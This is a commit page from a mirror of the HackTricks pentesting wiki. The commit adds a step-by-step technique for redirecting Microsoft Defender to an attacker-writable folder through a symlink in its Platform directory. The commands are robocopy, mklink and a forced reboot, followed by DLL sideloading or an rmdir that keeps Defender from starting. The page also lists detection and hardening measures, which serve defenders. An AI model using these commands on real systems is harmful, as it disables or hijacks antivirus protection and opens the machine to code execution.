maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Break The Protective Shell Of Windows Defender With The Fold...

Browse Source 
- Remove searchindex.js (auto-generated file)
This commit is contained in:
HackTricks News Bot 2025-09-18 12:42:07 +00:00
parent 0bd7ff12b2
commit 3ce59a98bc
1 changed files with 60 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
src/windows-hardening/av-bypass.md
View File

@ -892,6 +892,64 @@ References for PPL and tooling
- CreateProcessAsPPL launcher: https://github.com/2x7EQ13/CreateProcessAsPPL - CreateProcessAsPPL launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
- Technique writeup (ClipUp + PPL + boot-order tamper): https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html - Technique writeup (ClipUp + PPL + boot-order tamper): https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html
## Tampering Microsoft Defender via Platform Version Folder Symlink Hijack
Windows Defender chooses the platform it runs from by enumerating subfolders under:
- `C:\ProgramData\Microsoft\Windows Defender\Platform\`
It selects the subfolder with the highest lexicographic version string (e.g., `4.18.25070.5-0`), then starts the Defender service processes from there (updating service/registry paths accordingly). This selection trusts directory entries including directory reparse points (symlinks). An administrator can leverage this to redirect Defender to an attacker-writable path and achieve DLL sideloading or service disruption.
Preconditions
- Local Administrator (needed to create directories/symlinks under the Platform folder)
- Ability to reboot or trigger Defender platform re-selection (service restart on boot)
- Only built-in tools required (mklink)
Why it works
- Defender blocks writes in its own folders, but its platform selection trusts directory entries and picks the lexicographically highest version without validating that the target resolves to a protected/trusted path.
Step-by-step (example)
1) Prepare a writable clone of the current platform folder, e.g. `C:\TMP\AV`:
```cmd
set SRC="C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0"
set DST="C:\TMP\AV"
robocopy %SRC% %DST% /MIR
```
2) Create a higher-version directory symlink inside Platform pointing to your folder:
```cmd
mklink /D "C:\ProgramData\Microsoft\Windows Defender\Platform\5.18.25070.5-0" "C:\TMP\AV"
```
3) Trigger selection (reboot recommended):
```cmd
shutdown /r /t 0
```
4) Verify MsMpEng.exe (WinDefend) runs from the redirected path:
```powershell
Get-Process MsMpEng | Select-Object Id,Path
# or
wmic process where name='MsMpEng.exe' get ProcessId,ExecutablePath
```
You should observe the new process path under `C:\TMP\AV\` and the service configuration/registry reflecting that location.
Post-exploitation options
- DLL sideloading/code execution: Drop/replace DLLs that Defender loads from its application directory to execute code in Defenders processes. See the section above: [DLL Sideloading & Proxying](#dll-sideloading--proxying).
- Service kill/denial: Remove the version-symlink so on next start the configured path doesnt resolve and Defender fails to start:
```cmd
rmdir "C:\ProgramData\Microsoft\Windows Defender\Platform\5.18.25070.5-0"
```
Detection ideas
- Alert on new directory reparse points under `C:\ProgramData\Microsoft\Windows Defender\Platform\`.
- Watch for new version-looking folder names exceeding known Defender versions.
- Detect Defender binaries executing from non-standard paths (e.g., `C:\TMP\`).
- Sysmon telemetry: FileCreate (Event ID 11) with ReparsePoint/Symlink in that path; process starts for `MsMpEng.exe` with unexpected image path.
Hardening tips
- Enforce allow-listed execution paths with WDAC/AppLocker; prohibit Defender from running outside trusted directories.
- Continuously validate Defenders configured platform path; remediate anomalies.
- Keep Tamper Protection enabled; monitor for Defender platform location changes.
> Note: This technique does not provide privilege escalation by itself; it requires admin rights.
## References ## References
- [Unit42 New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/) - [Unit42 New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
@ -905,5 +963,7 @@ References for PPL and tooling
- [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon) - [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
- [CreateProcessAsPPL launcher](https://github.com/2x7EQ13/CreateProcessAsPPL) - [CreateProcessAsPPL launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
- [Zero Salarium Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html) - [Zero Salarium Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
- [Zero Salarium Break The Protective Shell Of Windows Defender With The Folder Redirect Technique](https://www.zerosalarium.com/2025/09/Break-Protective-Shell-Windows-Defender-Folder-Redirect-Technique-Symlink.html)
- [Microsoft mklink command reference](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}